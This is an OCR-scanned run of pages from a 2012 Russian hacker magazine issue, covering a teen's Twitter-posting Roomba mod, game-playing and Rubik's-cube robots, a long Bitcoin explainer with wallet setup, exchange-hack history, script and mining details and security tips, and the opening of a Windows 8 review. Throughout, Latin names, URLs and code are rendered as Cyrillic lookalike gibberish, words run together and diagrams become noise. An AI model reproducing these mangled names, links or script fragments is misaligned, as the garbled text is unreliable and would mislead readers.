Во вступлении к этой статье я упомянула, 
что робот-пылесос — это один из самых 
простых примеров робототехники в нашей 
повседневной жизни. В самом деле — что 
сложного и непонятного в этой маленькой 
плоской коробочке, которая тихонько 
ездит по полу и собирает мусор? Верно — 
ничего. Но некоторым людям отчаянно 
хочется сделать простое сложным и доба- 
вить обычным вещам чего-нибудь этакого. 

Пятнадцатилетний экспериментатор 
под ником таІсЫідЫег выложил на сайт 
ІпзІшсІаЫез результаты своего опыта 
по перепрограммированию популярной 
модели робота-пылесоса іРоЬоІ РоотЬа. 
Цель была проста — научить робота 
писать в Тѵѵіиег и оснастить его веб- 
интерфейсом. 

Юный хакер вскрыл корпус пылесоса, 
добрался до порта питания и изгото- 
вил собственный кабель интерфейса 
из 4-парного САТ5, который поддержи- 
вает скорость передачи данных до 100 
мегабит в секунду. Затем он добавил ре- 
гулятор напряжения между пылесосом 
и микроконтроллером Агсішпо для того, 
чтобы защитить последний от высокого 
напряжения. Когда конструкция была 
готова, он подключил іРоЬоІ РоотЬа 
и модуль беспроводного соединения 
ѴѴі-Рі к контроллеру. Написанный код 
позволил пылесосу делиться со всем 
миром сообщениями о том, чем он занят: 
1ѵѵіиег.сопп/#!/ТЬе РоотЬа . 




ВСЯ ВЛАСТЬ ПЫЛЕСОСАМ! 



Даже без сложных наворотов вроде Агсіиіпо робот-пылесос — интересная затея. Только представь 
себе бессонные ночи, проведенные за поиском идеального маршрута! Цены на самые простые 
пылесосы РоотЬа начинаются с 12-13 тысяч рублей, самые дорогие обойдутся в 30 с лишним тысяч. 
Различаются они, как ни странно, пылесосным функционалом, а также поддержкой интерфейсов 115В, 
ВІиеІооІЬ и прочего. 
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Не счесть у робота профессий 



РОБОТЫ, КОТОРЫЕ ИГРАЮТ 
В ИГРЫ 



Сегодня почти у всех нас есть смартфоны, а на этих 
самых смартфонах установлены различные игры. 

Но приходило ли тебе в голову, что ставить рекорды 
и даже просто играть за тебя может робот? Мне тоже 
не приходило, но, оказывается, это достаточно рас- 
пространенная тема :). 

Существует популярная игра для іРасі — «1 Іо 50». 

На экране появляются 50 квадратиков, на которых в слу- 
чайной последовательности разбросаны цифры от 1 до 
50. Задача пользователя — запустить таймер и за макси- 
мально короткое время успеть нажать на цифры в после- 
довательности от 1 до 50. В компании Абері ТесЬпоІоду 
( аберісот ) создали сверхбыстрый «интеллектуальный 
манипулятор» Абері Оііаиго, который справляется с этой 
задачей за 6,67 секунды, в то время как рекорд челове- 
ка — 7,85 секунды. 

Но если игра в «1 Іо 50» — это лишь наглядный при- 
мер работы Абері Оиаиго, который обычно используется 
в иных областях, то дельта-робот, созданный ребятами 
из ВііЬеат ( ЬііЬеат.огд ), сделан именно «Іюг Ішп». Этот 
робот, собранный на базе Агбиіпо, прекрасно справляет- 
ся с игрой в Апдгу Вігсіз: уои1и.Ье/х2е73НгаеРУ . 




БЫСТРЕЕ ВСЕХ КУБИК РУБИКА СОБЕРЕТ СОВЕБТОРМЕР II 



Наборы І_Е60 МіпсЫогтз недаром так по- 
пулярны среди поклонников робототехни- 
ки — из них можно собрать множество крутых 
штук. Отличное тому доказательство — робот 
СиЬеЭіогтег II, созданный на базе четырех 
наборов І_Е0О Міпсізіогтз І\ІХТ под управлени- 
ем смартфона Эатзипд Оаіаху 5 II. Этот робот 



способен собрать кубик Рубика за 5,4 секунды, 
что на 0,3 секунды быстрее рекорда, постав- 
ленного человеком. 

Авторами необычной машины выступают 
Майк Добсон и Дэвид Гилдэй. Эти парни рань- 
ше уже пытались создать робота, собирающего 
кубик Рубика, но поодиночке (так родились 



СііЬеЭіогтег и ЭреесІсиЬег). Чтобы побить ре- 
корд, установленный человеком, им пришлось 
объединиться. 

Они написали прогу для Эатзипд Оаіаху 
5 II, управляющую манипуляторами І_Е60 
по ВІиеІооіЬ. Первая секунда уходит у робота 
на сканирование граней куба (с помощью ка- 
меры смартфона), после чего смартфон на лету 
решает популярную головоломку, передавая 
необходимые команды манипуляторам робота. 

Сложно поверить, что робот способен упра- 
виться всего за пять секунд, поэтому советую 
увидеть это один раз своими глазами: 
ѵоЩц.Ье/ сІ0ЦкІи1:2М . 



УМНЫЙ КОНСТРУКТОР 



Чтобы сделать собственного робота на базе 
МіпсЫогтз, тебе понадобится набор 
примерно за 13-14 тысяч рублей. В эту цену 
входит программируемый контроллер, 
набор сенсоров и моторов — твои роботы 
смогут ориентироваться по звуку, свету 
и распознавать препятствия. Программировать 
при этом можно либо на фирменном языке, 
либо на любом другом — спомощью 
неофициальных решений, поддерживаемых 
сообществом энтузиастов. 
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Иван Тихонов ЫтіпйЬізес.сот) 





Впсоіп: 




новое цифровое золото? 



РАССКАЗЫВАЕМ ВСЁ 
ПРО ВИРТУАЛЬНУЮ 
ВАЛЮТУ БУДУЩЕГО 



Любой ІТ-энтузиаст хоть раз слышал 
о попытке создать полностью виртуальную 
валюту нового типа — о глобальнейшем 
социально-экономическом эксперименте 
под названием ЕШсоіп. Предлагаем тебе 
подробнейший обзор этой системы, 
не прекращающей вызывать интерес 
и споры на протяжении уже трех лет. 



первую очередь Віісоіп является наглядным свидетель- 
ством того, что сегодня даже самую необычную и на пер- 
вый взгляд безумную идею можно выразить с помощью 
программного кода и она будет распространяться дальше в виде 
готового продукта. Всеобщий интерес к знаменитой криптовалюте 
вызван рядом особенностей: 

• Віісоіп представляетсобой децентрализованную Р2Р-сеть, в ко- 
торой не существует контролирующего органа. 

• Все платежи анонимны и не могут быть отменены. 

• Низкие комиссииза переводы или их отсутствие. 

• Эмиссию новых денег производят сам и участники (это называется 
майнинг, подробнеечитай во врезке). 

• Денежная масса всистеме конечна (21 миллион биткоинов), алго- 
ритм и темпы эмиссии известны всем наперед. 

Исходя из свойств биткоина, нетрудно провести аналогии и по- 
нять, что создатели пытались сделать цифровой аналог золота. 
Судите сами: биткоин — исчерпаемый ресурс, чем больше его 
добыто, тем сложнее добывать его дальше. Его количество не 
зависит от количества людей, использующих его, его невозможно 
скопировать, его подделка выходит дороже его добычи. Теоретиче- 
ски его стоимость со временем только растет. 




ИНСТРУКЦИЯ ПО ПОЛУЧЕНИЮ ВІТСОІІЧ-КОШЕЛЬКА 



1. СкачайтеПОкошелькасофициальногосайтапроекта іісоіп.огд . 

2. Дождитесь полной синхронизации с сетью, это довольно длительный 
процесс. 

3. Настоятельно рекомендуем сразу зашифровать файл кошелька: «На- 
стройки ^Зашифровать бумажник». 

4. На вкладке«Получение монет»создайте несколько адресов, им 
можно давать метки, например «тіпіпд_рооІ», «сіопаіе», «ѵѵогк» 

и тому подобные, чтобы легче было впоследствии дифференциро- 
вать транзакции в истории. Для получения монет в свой кошелек 
предоставьте передающей стороне любой из этих адресов. На вклад- 
ке «Обзор» кошелек показывает общий баланс полученных монет на 
все адреса, за вычетом всех отправлений. 

5. Получитьпервыемонеты всвой кошелекможнонесколькимиспосо- 
бами: 

• попроситьотправитьихтому, кто ихимеет; 

• продать что-либо или оказатьуслуги за биткоины; 



• получить на специальных сервисах раздач типа 
ігееЬіісоіпз.аррзроі.сот ил и сІаіІѵЬіісоіпз.огд; 

• заработать на пулах, например 50Ыс. сот или сІеерЬіі.пеі; 

• обменять средства в других валютах на обменниках или биржах, 
кпримеру Ыс-е.сот или теІаЬапк.ги . 

6. Для пересылки монет нажмите на вкладку «Отправка монет», введи- 
те адрес кошелька или выберите из списка, кому вы хотите сделать 
перевод, далееукажите количество монети нажмите«Отправить». 
Учтите, что если кошелекзашифрован,то потребуется ввести пароль 
для отправки монет. 

7. Не забывайте периодически делать бэкапы кошелька «Файл -► 
Васкир ѵѵаііеі». 



ОЬіСсоіп 




Если ты видишь этот логотип в интернет-магазине, 
то он принимает к оплате Віісоіп 
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Віісоіп: новое цифровое золото? 



КАК ВСЕ НАЧИНАЛОСЬ 

Сам проект Віісоіп был представлен в 2009 году неким Сатоши На- 
камото (БаІозЫ Ыакато1о) — имя, скорее всего, вымышленное, что 
соответствует идеологии шифропанков. Он опубликовал исходные 
коды проекта и документ с описанием работы сети. После того 
как инициатива нашла своих сторонников, автор самоустранился, 
передав бразды правления развитием Гэвину Андрисену, руково- 
дителю разработки официального клиента Віісоіп. 

Как писал Сатоши в своем документе, он хотел исключить 
лишние финансовые институты и дать людям власть над их сред- 
ствами. Например, получив деньги за товар, вы не обнаружите, 
что через какое-то время их нет из-за мошеннических действий 
со стороны покупателя, как бывает с РауРаІ, ваш счет не забло- 
кируют, как случается с ѴѴеЬМопеу, и не потребуют предоставить 
документы, как делает Яндекс. Деньги. 

ФИНАНСОВАЯ ПИРАМИДА? ВОЗМОЖНО 

Чем обеспечен биткоин? Ничем — но то же самое можно сказать 
и о любой другой валюте! После того как США отказались от ис- 
полнения Бреттон-Вудского соглашения и доллар перестал быть 
обеспеченным золотом, сложилась интересная ситуация, когда 
все другие валюты продолжали быть обеспеченными долларом, 
а доллар не обеспечен ничем материальным. Да, он обеспечивается 
доверием граждан и военной машиной США, но он может печататься 
в любых нужных количествах, и инфляция США распространяется на 
все другие валюты, то есть получается скрытая дань со всего мира. 

Видимо, такая ситуация устраивает не всех, и биткоин создан 
как альтернатива данному режиму. Без единого эмиссионного 
центра, без возможности бесконтрольного наращивания денеж- 
ной массы, без контроля внешних организаций. Конечно, с эко- 
номической точки зрения у биткоина тоже есть и свои минусы: 
дефляционная модель располагает больше к накоплению средств, 
чем к трате, утерянные монеты не компенсируются, украденные 
средства не могут быть возвращены владельцу простой отменой 
транзакции. Так что, как известно, у каждой медали две стороны. 

БЕЗОПАСНОСТЬ ВІТСОІМ 

Для начала стоит разделить понятия безопасности криптовалюты 
Віісоіп и безопасности сервисов, которые ее используют. Часто 




Курс обмена Віісоіп на доллары на бирже МІ.Сох 



в Сети можно увидеть желтые заголовки об «очередном взломе 
Віісоіп», а в теле заметки говорится о взломе биржи или онлайн- 
кошелька. Проводя аналогии, с тем же успехом можно заявить, 
что рубль — ненадежная валюта, после того каку вас в метро 
украли кошелек с рублями. 

Начать стоит с того, что исходный код Віісоіп был изучен уже 
вдоль и поперек специалистами по безопасности, сама сеть 
не была взломана ни разу. Конечно, это не означает, что у нее 
нетуязвимых мест, но те немногие потенциально уязвимые места, 
которые обнаруживались, закрывались до того, как ими успевали 
воспользоваться злоумышленники. 

Однако, даже если предположить, что сообщество будет до- 
сконально проверять каждый новый релиз и не примет билды с за- 
кладками, существует вероятность, что противник может вложить 
крупную сумму денег в производство А5ІС-майнеров, сделать 
мощнейший вычислительный центр, который офлайн сгенерирует 
липовую побочную ветвь с большей сложностью и в определенный 
момент выложит ее в сеть, заменив текущую настоящую ветвь. 
Конечно, такой сценарий маловероятен, но совсем не учитывать 
его нельзя. 

И есть не только технические пути насолить проекту. Возьмем, 
например, экономический: те же США могут выделить деньги 
для дестабилизации курса и создания в СМИ негативного образа 
Віісоіп. Скупая и продавая его на биржах, можно устроить такие 
скачки курсов, что реальный сектор откажется от этого платежного 
средства, а законодательные запреты и давление на владельцев 
бирж, обменников и других сервисов закончат начатое. 



САМЫЕ ГРОМКИЕ ИСТОРИИ ВЗЛОМА ВІТСОШ-СЕРВИСОВ 



СЕРВИСЫ, КОТОРЫМИ СТРЕМИТЕЛЬНО ОБРАСТАЕТ СЕТЬ, К СОЖАЛЕНИЮ, ПОКАЗЫВАЮТ НЕ СТОЛЬ ВПЕЧАТЛЯЮЩУЮ СТАТИСТИКУ 
В ПЛАНЕ БЕЗОПАСНОСТИ. ПЕРЕЧИСЛИМ ТОЛЬКО НАИБОЛЕЕ НАШУМЕВШИЕ СЛУЧАИ ВЗЛОМОВ И ПОТЕРЬ СРЕДСТВ. 
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У пользователя 
аіііпѵаіп украли 
с компьютера 
25 000 ВТС. 

Почти в это же 
время компа- 
ния Буппапіес 
обнаруживает 
в сети новый 
троян, который 
занимался только 
кражами биткоин- 
кошельков. 



Ьіісаіп 



Взломана 
крупнейшая 
Віісоіп-биржа 
МІ.Сох. Злоумыш- 
ленники увели всю 
клиентскую базу. 
При этом была 
выведена часть 
средств, и курс 
на этой бирже 
был намеренно 
обрушен. 





Администратор 
Віісоіп-биржи 
Ьііотаі.рі Бартек 
Шаббат (Вагіек 
ЗЬаЬЬаі) сообщил, 
что потерял файл 
ѵѵаііеі.сіаі: со всеми 
средствами в ре- 
зультате апгрейда 
сервера. 



Онлайн-кошелек 

туЬіІсоіп.сот 

взломан, с него 
вывели около 
половины средств, 
что составило при- 
мерно 76 000 ВТС. 



03.2012 05.2012 07.2012 



ВТС о '§^ 






Взломаны серверы 
хостера Ыпосіе, 
злоумышленники 
получили доступ 
к кошелькам 
сервисов, распола- 
гавшихся на нем. 
Например, у пула 
тіпіпд.ЬіІсоіп.сг 
было украдено 
3094 ВТС, а у биржи 
Віісоіпіса — 43 554 
ВТС. 



Вновь неприят- 
ности у биржи 
Віісоіпіса, в ре- 
зультате взлома 
хакеры вывели 
средств на 87 000 
долларов. Взлом 
произошел после 
того, как в Сеть 
утекли исходные 
коды проекта. 



Взломана биржа 
ВТС-Е.сот, был 

скомпрометирован 
5есгеІ-кеу на АРІ 
ЫЬегІу Резегѵе, 
хакеры сымитиро- 
вали пополнение 
счета и скупили 
все предложения 
Ьіісоіп, Іііесоіп, 
патесоіп. Вывести 
смогли только 4500 
ВТС. 



И в третий раз 
Віісоіпіса: бывший 
совладелец биржи 
использовал 
АРІ-ключ Мібох 
в качестве пароля 
для ЬазіРазз. 
После предыду- 
щего взлома его не 
меняли. Вывести 
удалось 40 000 
долларов и 40 000 
ВТС. 
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И это только один из возможных путей развития событий. 

Но пока что у сети, наоборот, наблюдается только бурный рост, 
она обрастает кучей сервисов, вычислительная мощьтолько рас- 
тет, как и интерес со стороны пользователей. 

ГДЕ ПОЛУЧИТЬ И НА ЧТО ПОТРАТИТЬ? 

Не секрет, что анонимность Віісоіп привлекла к нему заинтересо- 
ванный контингент. Віісоіп действительно начал использоваться 
как платежное средство, но первыми на него обратили внимание 
торговцы наркотиками, оружием и прочим нелегальным товаром. 
Как пример можно привести широко известный онлайн-магазин 
Біік РоасІ с ежемесячным оборотом в 2 миллиона долларов, до- 
ступ в который возможен только через анонимную сеть Тог. 

Однако биткоин используется не только для нелегальных 
операций. Некоторые предприниматели обратились к нему, оценив 
преимущества перед другими платежными системами. Например, 
один из магазинов, продающих спортивное питание, начал прини- 
мать Віісоіп послетого, как ѴѴеЬМопеу заморозили без предупре- 
ждения счет с оборотными средствами. С Віісоіп это невозможно. 

Наиболее полный список легальных сервисов и магазинов, ко- 
торые принимают ВТС в качестве оплаты, можно найти на странице 
Віісоіп ѵѵікі, посвященной торговле ( ЬирзѴ/еп.Ьікоіп.ііА/ѵікі/ТгасІе ). 

В нем находятся сотни ресурсов, которые предлагают самые раз- 
личные товары и услуги — от музыки и хостинга до одежды и элек- 
троники. На многих интернет-магазинах можно увидеть значок 
«Віісоіп ассеріеб беге», что означает: тут вы можете расплатиться 
биткоинами наравне с другими платежными системами. А в по- 
следнее время подобные таблички можно встретить в некоторых 
кафе, барах и других офлайн-заведениях. 

ПЕРСПЕКТИВЫ ВІТСОІМ 

Наблюдая за бурным развитием сети, трудно сомневаться в успеш- 
ности этого проекта. Конечно, не всем он по нраву, и явно мы еще 
встретимся с попытками запретить использование этой криптова- 
люты. Но джинн из бутылки уже выпущен, люди увидели, что есть 




альтернативы привычным фиатным деньгам. Вполне возможно, 
что широкую известность технология получит совсем не в том виде, 
который мы наблюдаем сейчас, но сами принципы и идеи уже до- 
несены до общества. И, судя по реакции и стремительно растущему 
сообществу, эти идеи более чем актуальны в наших реалиях. 

Да, сейчас биткоином как платежным средством активно поль- 
зуются для незаконных или сомнительных сделок, но то же можно 
сказать о любой другой валюте мира. Прогресс нельзя остановить, 
гонцы с депешами давно уступили место электронной почте, 
а вместо «Алло, барышня! Соедините с ...» в телефонную трубку мы 
машем рукой в камеру на смартфоне. Так же и Віісоіп вполне может 
занять свою нишу в платежных системах, заставив потесниться 
традиционные валюты. Ш-И 



Віісоіп изнутри 

Технически Віісоіп представляет собой Р2Р- 
сеть, образованную ПО бумажника. Упрощенно 
бумажник состоит из программы, которая 
работает по известным всей сети алгоритмам, 
базы данных всехтранзакций за все время (ис- 
пользуется Вегкіеу БВ) и файла кошелька, где 
хранятся пары ключей для подписи транзакций. 

Для приема средств в сети Віісоіп исполь- 
зуются адреса. Это последовательность букв 
и цифр, которая является вашим идентифика- 
тором в сети. Адреса генерируются локально 
на компьютере пользователя, их может быть 
сколько угодно в одном кошельке, по умолча- 
нию при создании нового кошелька в нем соз- 
даются 100 адресов (а точнее, пар ключей), при 
их нехватке бумажник создает дополнительные 
адреса самостоятельно. Пример Віісоіп-а дреса: 

1В09д2а7-Рп95п5СуР0В32с№6ЬіВ1:к1:4ее 

Адреса строятся по определенным прави- 
лам: в текущей версии протокола все адреса 
начинаются с единицы, он является 160-битным 
хешем от открытого ключа ЕС05А ключевой 
пары, которая хранится в файле кошелька. 
Поскольку адрес строится по определенному 



алгоритму и включает в себя контрольную сум- 
му, ПО бумажника может определить, является 
ли введенная строка адресом Віісоіп или нет; 
если нет, то отправить на него монеты будет 
невозможно. Однако если строка удовлетворяет 
этим параметрам, но вы ошиблись адресом или 
закрытый ключ из его пары утерян, монеты, 
отправленные на него, будут потеряны. 

Чтобы осуществить транзакцию, нужно под- 
писать закрытым ключом данные о передаче 
средств и транслировать эти данные в сеть. Для 
осуществления транзакций в Віісоіп применя- 
ется РогіЬ-подобная скрипт-система. БсгіріБід 
на входе и ссылающийся на него зсгіріРиЬКеу 
на выходе оцениваются (именно в таком поряд- 
ке) с использованием значения зсгіріРиЬКеу из 
стека зсгіріБід. Вход признаётся действитель- 
ным, если зсгіріРиЬКеу возвращает значение 
Ігие (истина). 

Віісоіп-адрес представляет собой хеш, 
поэтому отправитель не может указать полный 
открытый ключ в зсгіріРиЬКеу. При получении 
монет, отправленных на Віісоіп-адрес, полу- 
чатель должен предоставить и подпись (зід), 
и открытый ключ (риЬКеу). Скрипт проверяет, 
возможно ли с помощью данного открытого клю- 
ча получить присланный хеш, затем проверяет 
подпись к предоставленному открытому ключу. 



зсгірІіРиЬКеѵ: ОР РЦР ОР НА5Н16Ѳ \ 

<риЬКеуНазІп> ОРЕОЦАІ.ѴЕКІГУ ОРСНЕСК5І6 
5сгір1:5і%: <зі§> <риЬКеу> 

БсгіріРиЬКеу — это вторая половина скрип- 
та. Транзакция может содержать больше одного 
выхода, для того чтобы обработать всю сумму 
ВТС, указанную на входе. К примеру: если вход 
ссылается на транзакцию в 100 ВТС, а вы хотите 
отправить получателю только 50 ВТС, то будет 
создано два выхода: первый к Віісоіп-а дресу 
получателя, а второй обратно на один из ваших 
адресов. В случаях, когда на выходах транзак- 
ции обрабатывается не вся сумма ВТС, указан- 
ная на входе, любой необработанный остаток 
ВТС признаётся комиссией за транзакцию: май- 
нер или пул, сгенерировавший блок, в который 
включена запись о данной транзакции, получит 
эту не включенную сумму. 

Транзакции могуттолько переводить сред- 
ства с одних адресов на другие путем перепод- 
писывания, единственное исключение — эмис- 
сия новых биткоинов, транзакция генерации 
монет имеет один вход с параметром «соіпЬазе» 
вместо параметра зсгіріБід. 

Все транзакции в сети Биткоин упаковыва- 
ются в блоки. Блок включает в себя хеш пред- 
ыдущего блока, набор транзакций и случайные 
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Віісоіп: новое цифровое золото? 



БЕЗОПАСНОСТЬ КОШЕЛЬКА МАЙНИНГ 



Безопасность кошелька Віісоіп — это целиком и полностью зона 
ответственности пользователя. Дадим краткие рекомендации, 
которые могут повысить безопасность хранения средств в личном 
кошельке: 

1. Держите кошелек на специально выделенном для этого компью- 
тере или хотя бы виртуальной машине. 

2. Используйте актуальную версию кошелька, следите за обновле- 
ниями ПО. 

3. Используйте встроенную защиту шифрования кошелька, ис- 
пользуйте надежный пароль. 

4. Делайтесвоевременныерезервныекопии кошелька ихраните 
ихна внешнихносителях. 

5. Не запускайте свой кошелек на чужих компьютерах. 

6. Не отправляйте незашифрованный кошелек по сети. 

Будьте бдительны, не поддавайтесь на уловки мошенников. 
Помните, что практически все технические приемы защиты 
бесполезны, если вы своими руками передадите контроль над 
вашими средствами мошенникам. 



ПОЛЕЗНЫЕ СЕРВИСЫ ДЛЯ ВІТСОІЫ 

— сервис статистики, данные о транзакциях и майн инге 
ЫісоіпсЬагіз.сот — колебания курсов набиржах 
уѵеизесоіпз.сот/дІоЬе-Ьіісоі — карта активности Віісоіп вмире 



Майнинг — это процесс добычи биткоинов путем нахождения блоков по алгоритму: 
Хеш = 5НА-2 (5НА-2 (Полезная нагрузка + Случайное число)) 

Майнеры перебирают случайно генерируемые байтовые 
последовательности (попсе), в надежде найти хеш, который будет меньше, чем 
текущая цель, которая обратно пропорциональна сложности. При нахождении 
такого хеша майнер рассылает в сеть информацию о найденном блоке 
и получает эмиссионные средства. Сейчас за нахождение блока дается 50 ВТС, 
в дальнейшем это число будет уменьшаться. 

Майнинг может быть экономически выгоден, но из-за того, что сложность 
и курс биткоина непредсказуемы, на этом нельзя построить стабильный 
заработок. Были периоды в прошлом году, когда приобретенная для майнинга 
видеокарта могла окупиться за две недели, а были и такие падения курса, что 
многие выключали майнинг, так как оплата счетов за электричество превышала 
доход. 

Рассчитатьсвой доход можно на специальных калькуляторах, которые на 
основании курса, сложности, хешрейта, стоимости электричества и вложений 
в железо могут предсказать доход. Для примера можно привести этот кальку- 
лятор — ірЬіісаІс.аррзроі.сот . 

Сразу стоит оговориться, что далеко не на любом оборудовании майнинг 
выгоден, наилучшим образом для него подходят видеокарты АМ йот 5*** серий 
и выше. Наиболее полную таблицу устройств и их скоростей можно найти в та- 
блице сравнения аппаратного обеспечения вВіІсоіп ( 1ѵ/сІМ^Р)Ь ). Для работы 
понадобится клиентВС и программа-майнер. 

Майнить в одиночку — занятие для крепких духом людей, так как при 
текущих показателях сложности можно ждать месяцы и годы, прежде чем 
найдется блок, если вы не располагаете мощнейшими фермами. Поэтому 
майнеры стали объединяться в пулы совместной добычи. 



данные — попсе. Блок признаётся сетью, когда 
его хеш соответствуеттекущей сложности, 
то есть меньше какого-то числа. Сложность 
является регулирующим фактором, от которого 
зависит скорость нахождения блоков. Посколь- 
ку за нахождение блока дается вознагражде- 
ние нашедшему, блоки должны находиться 
с определенной частотой, таким образом 
поддерживается заданный темп эмиссии в сети, 
график которой приведен выше. Для того чтобы 
хеш блока был меньше, майнеры перебирают 
попсе, хешируя заголовок блока, и проверяют, 
стал ли он меньше сложности или нет. 

Здесь стоит рассказать, зачем нужен 
такой параметр, как сложность. Изменяя 
сложность, можно заранее сказать, сколько 
примерно попыток требуется, чтобы найти 
подходящий хеш. Сложность автоматически 
пересчитывается и изменяется каждые 2016 
блоков так, чтобы в среднем находилось шесть 
блоков в час. Если вычислительные мощ- 
ности майнеров выросли и находится больше 
блоков, чем нужно, то сложность повышается 
до того уровня, чтобы при текущей мощности 
блоки находились с нужной скоростью. Точно 
также она может понизиться, если суммарная 
вычислительная скорость сети понижается. То 
есть не имеет значения, работает над поиском 



хеша, закрывающего блок, один человек на 
ноутбуке или миллион людей с высокопроиз- 
водительными вычислительными кластерами, 
сложность подстроится так, чтобы в любом 
случае находилось шесть блоков в час. К слову, 
сейчас вычислительная скорость сети Віісоіп 
превышает скорость любого существующего 
суперкомпьютера. 

Вся сеть в один момент времени работает 
над нахождением одного блока. Поскольку каж- 
дый блок включает в себя хеш предыдущего, 
то получается единая цепочка блоков, которая 
хранит всю историю обо всех транзакциях, 
когда-либо произошедших в сети. 

Если вдруг происходит так, что примерно 
в одно время сразу два и более участника сети 
находят блок, то происходит разделение цепоч- 
ки. Но основная ветвь может быть только одна, 
поэтому чья цепочка продолжится быстрее, та 
и будет признана основной ветвью, а побочная 
будет признана сетью недействительной, а сам 
блок — огрЬап, и награда за его нахождение 
тоже будет недействительна. Бывает так, что 
обе ветви получают продолжение почти одно- 
временно, тогда они обе еще продолжаются, 
но все равно одна из ветвей чуть позже станет 
длиннее, и побочная будет признана недей- 
ствительной. 



Открытый ключ 



'1 32 байта (ВЕ) 32 байта (ВЕ) 



ГІреіТІГІ140[зІТа?54( И Згбайта [БЕ) | 32 байта (ВЕ) | |] 



Байт идентификатора сети 
основная сеть: 0x00 
Тестовая сеть: 0x6^ 
Матесоіп сеть: 0x34 



5 Ьа 256 [зЬа$ 5 бПі 




/Контрольная сумма 



25-байтовый двоичны й.-ёдрес 



1 20 байтов 4 



Преобразование 
1 Ваве 256 к Вазе58 
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Процесс генерации адреса в Віісоіп 
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РС20ЫЕ 




ѴѴеІсоте 

Місгобоіі официально завершила разработку ѴѴіпсіоѵѵб 8, и любой 
желающий может ознакомиться с финальной версией в триальном 
режиме. Новая ОС содержит множество интересных решений 
для планшетов и подобных устройств. Но не забыли ли в Редмонде 
о своих главных клиентах — владельцах традиционных компьюте- 
ров? Сегодня мы рассмотрим новую ОС с точки зрения безмолв- 
ствующего большинства — владельцев ноутбуков и десктопов, 
для которых польза от апгрейда с «семерки» совсем неочевидна. 
Что нового может предложить им свежеиспеченная ОС? 




■щ ѴѴіпсіоѵѵб 8 

РЕ5КТОР ЕРШОМ 




Главное — не прислоняться 

Концепция Меіто оказалась непривычной не только для пользователей, но и для разработчиков. При 
проектировании Меіто-приложений приходится учитывать их специфику. Дело в том, что такие приложе- 
ния взаимодействуют с системой через так называемые расширения, а для взаимодействия друг с другом 
используется система контрактов. Поэтому десктопные приложения и Меіто никак не могут взаимодей- 
ствовать друг с другом. 




Рагіу Ііке іі'б 1992 

С первых бет \А/іп8 стало очевидно, что система будет состоять из двух частей — Меіто-интерфейса 
и стандартного десктопа. Фактически десктоп стал лишь одним из приложений ѴѴіпсіоѵѵб. Ничего не на- 
поминает? Місгобо^і: 20 лет назад выпустила надстройку над 005 в виде ѴѴіпЗ.1. Симптомы те же: две не 
связанные между собой части системы, главенство нового интерфейса и урезанная функциональность 
по сравнению с тем, от чего пользователя пытаются отучить. Чтобы пересадить пользователей с 005 на 
винду, у Місгобоіі ушли годы — с Ме*го быстрее тоже не выйдет. 
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АНТОН 

Жуков 



ѴѴіпсіоѵѵб Біоге 

По примеру компании Арріе с ее Арр 51:оге, МісгобоТі; решила сделать свой магазин. Если вспомнить опыт Арр 51:оге, то с его появлением раз- 
работчики начали писать много маленьких полезных утилит, заточенных под конкретную задачу, так как такой софт стало легче продвигать. 

Однако с десктопными приложениями ѴѴіпсіоѵѵб 5*оге пока не слишком дружит — чтобы купить программу, придется идти на сайт разработчи- 
ка. Пропадает большинство преимуществ концепции Арр $1:оге — разработчикам нужно самим думать об оплате, распространении обновле- 
ний и многом другом. 




Бкуйгіѵе 

Облачный сервис Місгозо^І: эволюционировал из «убийцы 
ОгорЬох» в стандартную функцию ОС, позволяющую не только 
хранить данные в облаке и обмениваться ими с другими пользо- 
вателями, но и хранить в нем настройки пользователя, получать 
удаленный доступ к машине и многое другое. Решение аналогично 
іСІоиб в новых версиях 05 X, но имеет ряд преимуществ — со- 
вместимость с другими платформами, наличие нормального 
веб-интерфейса и понятную файловую структуру. Для обеспечения 
безопасности удаленного доступа предусмотрен механизм двух- 
факторной аутентификации. 

Некоторые нововведения порадуют разработчиков, пользующихся 
БкуРгіѵе АРІ, — как и в случае с ІСІоиб, облачный функционал мож- 
но встроить в собственное приложение. На текущий момент число 
пользователей Зкуйгіѵе достигает 17 миллионов, а общий объем 
хранимых данных — примерно 10 петабайт. 




Нурег-Ѵ 

Система виртуализации Нурег-Ѵ перекочевала в настольную 
«восьмерку» прямиком из серверных ѴѴіпсіоѵѵб, заменив Місгобоіі 
Ѵігіиаі РС (ты тоже забыл про эту софтину?). Для использования 
Нурег-Ѵ потребуется 64-разрядная версия ѴѴіпсіоѵѵб 8 в редакции 
не ниже Рго и процессор, поддерживающий функции аппаратной 
виртуализации и преобразования адресов второго уровня (5І_АТ; 
присутствует в текущем поколении 64-разрядных процессоров 
Іпіеі и АМР). 

В распоряжении пользователя оказывается все необходимое: 
поддержка 32- и 64-разрядных гостевых систем, режимы сна 
и гибернации, консоль и возможность подключения к удаленному 
рабочему столу. В общем, про Нурег-Ѵ писать можно еще доста- 
точно долго, так что рекомендую тебе самостоятельно ознако- 
миться с тем, что представляет собой данная технология и как она 
реализована в ѴѴіпсіоѵѵб 8, — ЬііІу/цІіСрК9, а также мануалом, как 
поднять Нурег-Ѵ на своей восьмерке, — ЬііІуЛВеиіп. 





ѴѴіпсіоѵѵб йе^епсіег 

Впервые в истории ѴѴіпсіоѵѵб поставляется Місгобо^і: с предустанов- 
ленным антивирусом. ѴѴіпсіоѵѵб Ре^епсіег стал симбиозом двух про- 
дуктов — непосредственно ѴѴіпсіоѵѵб Ре^епсіег (штатного инстру- 
мента поиска таіѵѵаге из прошлых версий) и антивируса Місгобо^ 
Бесигііу Еззепбаіз (раньше распространялся отдельно). 

Что интересно, Місгобоіі обеспечила такое поведение своего анти- 
вируса, что он не будет мешать установке стороннего антивирус- 
ного ПО. При инсталляции последнего Ре^епсіег будет попросту 
«уходить в тень». Это логично, так как если в системе два работаю- 
щих антивируса — то один из них скорей всего заблокирует другой. 
Кроме того, операционная система будет следить за тем, чтобы 
установленное антивирусное ПО было обновлено. В противном 
случае ѴѴіпсіоѵѵб Ре^епсіег будет автоматически предложен в каче- 
стве альтернативы. Конечно, антивирусные решения от Місгобоіі 
никогда не славились особой надежностью, но все же наличие бес- 
платного антивируса прямо из коробки можно отнести к плюсам 
новой системы. 





ІМеѵѵз 






| Л 



ѴѴеаіЬег 



ХАКЕР 10/165/2012 



045 









Безболезненная установка ѴѴіпсІоѵѵз 8 - ѴѴогсІРасІ 
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Расскажу о самом простом способе попробовать «восьмерку» на реальном железе. Речь пойдет об установке на виртуальный диск (ѴРЮ — ѴИиаІ 
